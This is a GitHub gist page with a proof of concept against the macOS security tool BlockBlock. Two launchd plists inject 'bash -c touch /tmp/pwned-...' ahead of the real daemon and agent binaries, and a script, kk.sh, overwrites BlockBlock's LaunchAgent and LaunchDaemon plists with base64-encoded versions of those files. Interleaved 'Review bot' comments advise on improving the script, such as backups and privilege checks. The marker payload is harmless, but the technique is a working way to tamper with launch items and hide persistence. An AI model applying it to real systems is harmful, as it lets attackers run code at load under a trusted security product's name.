@flipphillips
Created March 3, 2022 02:32

Revisions

  1. @pwnsdx pwnsdx revised this gist Aug 26, 2016. 2 changed files with 0 additions and 0 deletions.
  2. @pwnsdx pwnsdx created this gist Aug 26, 2016.
    17 changes: 17 additions & 0 deletions 1-com.objectiveSee.blockblock.plist
    @@ -0,0 +1,17 @@
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
    <key>AbandonProcessGroup</key>
    <true/>
    <key>Label</key>
    <string>com.objectiveSee.blockblock.daemon</string>
    <key>ProgramArguments</key>
    <array>
    <string>bash</string>
    <string>-c</string>
    <string>touch /tmp/pwned-privileged; /Applications/BlockBlock.app/Contents/MacOS/BlockBlock daemon</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    </dict>
    </plist>
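Review bot: in ProgramArguments the first argument is a shell (`bash -c`) and `touch /tmp/pwned-privileged;` is placed in front of the BlockBlock daemon path, so the job no longer starts the program its Label names directly. With RunAtLoad set to true, everything in that string runs when the job is loaded, in the privileged context the marker name refers to; state that in the gist description. For defenders, a launchd item whose Label names a known product while its first argument is a shell is worth flagging. This file also starts at the DOCTYPE line and lacks the `<?xml version="1.0" encoding="UTF-8"?>` declaration that 2-com.objectiveSee.blockblock.plist has; add it so the two files are consistent.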
    18 changes: 18 additions & 0 deletions 2-com.objectiveSee.blockblock.plist
    @@ -0,0 +1,18 @@
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
    <key>AbandonProcessGroup</key>
    <true/>
    <key>Label</key>
    <string>com.objectiveSee.blockblock.agent</string>
    <key>ProgramArguments</key>
    <array>
    <string>bash</string>
    <string>-c</string>
    <string>touch /tmp/pwned-unprivileged; /Applications/BlockBlock.app/Contents/MacOS/BlockBlock agent</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    </dict>
    </plist>
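Review bot: `bash` in ProgramArguments is a bare name rather than an absolute path, so which binary runs depends on the search path the job is given; write `/bin/bash` to make it unambiguous. The marker `/tmp/pwned-unprivileged` is a fixed name in a shared directory, and `touch` succeeds on a file that already exists, so the presence of the file alone does not show that this agent ran. Remove any stale marker before the test, or check the file's owner and timestamp afterwards.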
    5 changes: 5 additions & 0 deletions kk.sh
    @@ -0,0 +1,5 @@
    # Inject malicious datas into BlockBlock plist (will create "pwned-unprivileged" file in /tmp) (unprivileged)
    (> ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBbdG91Y2ggL3RtcC9wd25lZC11bnByaXZpbGVnZWQ7IC9BcHBsaWNhdGlvbnMvQmxvY2tCbG9jay5hcHAvQ29udGVudHMvTWFjT1MvQmxvY2tCbG9jayBhZ2VudAlfECFjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suYWdlbnQIESc6REpLT1RXtbYAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist)

    # Inject malicious datas into BlockBlock plist (will create "pwned-privileged" file in /tmp) (privileged)
    (> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBadG91Y2ggL3RtcC9wd25lZC1wcml2aWxlZ2VkOyAvQXBwbGljYXRpb25zL0Jsb2NrQmxvY2suYXBwL0NvbnRlbnRzL01hY09TL0Jsb2NrQmxvY2sgZGFlbW9uCV8QImNvbS5vYmplY3RpdmVTZWUuYmxvY2tibG9jay5kYWVtb24IESc6REpLT1RXtLUAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > /Library/LaunchDaemons/com.objectiveSee.blockblock.plist)
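Review bot: both commands overwrite com.objectiveSee.blockblock.plist in place with no backup of the original and no restore step, so a test run leaves the BlockBlock launch items modified; copy the originals aside first and document how to put them back. The second command writes under /Library/LaunchDaemons, which the comment marks as privileged, but the script has no shebang, no `set -e` and no check that it is running with the rights it needs, so it can stop half way with only the agent file changed. The payloads are base64 strings that begin with the `bplist00` binary plist magic; add a comment saying which of the two XML files in this gist each one corresponds to, so a reader can verify that by decoding rather than trusting the blob. The leading `> file;` truncation is redundant with the redirect that follows it, and "datas" in both comments should read "data".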